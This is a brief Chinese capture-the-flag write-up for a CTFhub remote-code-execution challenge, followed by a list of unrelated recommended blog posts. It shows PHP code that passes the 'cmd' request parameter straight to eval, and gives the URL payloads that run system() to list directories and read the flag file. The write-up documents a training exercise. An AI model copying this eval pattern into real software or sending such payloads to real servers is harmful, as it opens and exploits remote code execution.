CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
chools1 小时前
【AI超级智能体】快速搞懂工具调用Tool Calling 和 MCP协议
java·人工智能·学习·ai
懂懂tty1 小时前
CRA 迁移 Rspack(实战)
前端·架构
李白你好2 小时前
TongWeb EJB 反序列化生成工具(Java-Chain 插件)
java·安全
小码哥_常2 小时前
Kotlin 助力 Android 启动“大提速”
前端
U盘失踪了3 小时前
Java 的 JAR 是什么?
java·jar
GreenTea3 小时前
AI 时代,工程师的不可替代性在哪里
前端·人工智能·后端
Jagger_3 小时前
能不能别再弄低代码害人了
前端
朦胧之3 小时前
AI 编程开发思维
前端·后端·ai编程
今天又在写代码3 小时前
java-v2
java·开发语言
踩着两条虫4 小时前
VTJ:快速开始
前端·低代码·架构
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04Claude Code Windows 兼容性问题:指定版本 2.1.112 可解决05UBUNTU Claude Code 报错 claude native binary not installed06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07从限购到畅通:GLM-5.1 Coding Plan接入攻略08从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程09GPT-6发布日深度解析-Symphony架构200万Token实战10零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)